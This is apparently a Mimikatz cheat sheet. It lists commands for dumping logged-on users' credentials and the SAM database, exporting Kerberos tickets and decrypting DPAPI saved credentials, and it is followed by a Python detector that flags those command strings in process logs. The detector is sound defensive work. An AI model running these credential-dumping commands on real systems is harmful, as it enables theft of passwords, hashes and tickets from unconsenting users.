
Mimikatz

A little tool to play with Windows security. GitHub: gentilkiwi/mimikatz

Passwords & SAM

Launch mimikatz (as Administrator!)
mimikatz.exe
Engage SeDebugPrivilege
privilege::debug
-> OK
Whoami
token::whoami
Dump creds of all logged-on users
sekurlsa::logonpasswords
(Optional) Impersonate NT AUTHORITY\SYSTEM
token::elevate
Dump the SAM database
lsadump::sam

Tickets

Show tickets
sekurlsa::tickets
Export tickets
kerberos::list /export

Credential manager saved credentials

Locally?
vault::cred
From DC?
dpapi::cred /in:"C:\Users\Bethany\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D"
[...]
guidMasterKey : {fbd1319f-d18d-448f-92e2-287944ecf24c}
[...]
dpapi::masterkey /in:"C:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\fbd1319f-d18d-448f-92e2-287944ecf24c"
-> Look for "[domainkey]", then decrypt by running the same command with /rpc
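
A defender-side view of the commands listed on this page, as an added example that is not part of the original page: a Python scan that flags these module::command strings in process-creation command lines. The key=value event layout, host names and binary names are constructed assumptions, and the scan only sees commands passed as process arguments, not ones typed into the interactive mimikatz console.

```python
import re
from collections import defaultdict

# Module::command pairs listed on this page, mapped to the page's own labels.
PAGE_COMMANDS = {
    "privilege::debug": "Engage SeDebugPrivilege",
    "token::whoami": "Whoami",
    "token::elevate": "Impersonate NT AUTHORITY\\SYSTEM",
    "sekurlsa::logonpasswords": "Dump creds of all logged-on users",
    "lsadump::sam": "Dump SAM database",
    "sekurlsa::tickets": "Show tickets",
    "kerberos::list": "Export tickets",
    "vault::cred": "Credential manager (local)",
    "dpapi::cred": "Credential manager (credential file)",
    "dpapi::masterkey": "DPAPI master key",
}
# Commands that read secrets, as opposed to setup steps like privilege::debug.
DUMPING = set(PAGE_COMMANDS) - {"privilege::debug", "token::whoami", "token::elevate"}
TOKEN = re.compile(r"\b(privilege|token|sekurlsa|lsadump|kerberos|vault|dpapi)::(\w+)", re.I)
# Assumed (constructed) event layout: ... host=NAME ... CommandLine="..."
FIELD = re.compile(r'host=(\S+).*?CommandLine="(.*)"$')

def scan(lines):
    """Return {host: {"commands": [...], "severity": "high" | "medium"}}."""
    seen = defaultdict(list)
    for line in lines:
        m = FIELD.search(line.strip())
        if not m:
            continue
        host, cmdline = m.groups()
        for mod, cmd in TOKEN.findall(cmdline):
            key = f"{mod}::{cmd}".lower()  # match regardless of letter case
            if key in PAGE_COMMANDS and key not in seen[host]:
                seen[host].append(key)
    return {h: {"commands": c,
                "severity": "high" if DUMPING & set(c) else "medium"}
            for h, c in seen.items() if c}

# Constructed sample events (hypothetical hosts, users and binaries, not real logs).
SAMPLE = [
    'ts=2024-01-01T10:00:00Z host=WS01 user=alice CommandLine="C:\\Windows\\System32\\whoami.exe /all"',
    'ts=2024-01-01T10:02:11Z host=WS02 user=bob CommandLine="m.exe \\"privilege::debug\\" \\"SEKURLSA::LogonPasswords\\" exit"',
    'ts=2024-01-01T10:05:40Z host=WS03 user=carol CommandLine="tool.exe privilege::debug exit"',
]

if __name__ == "__main__":
    for host, hit in scan(SAMPLE).items():
        print(host, hit["severity"], [PAGE_COMMANDS[c] for c in hit["commands"]])
```

Matching on the command strings rather than the binary name keeps the check working when the executable has been renamed.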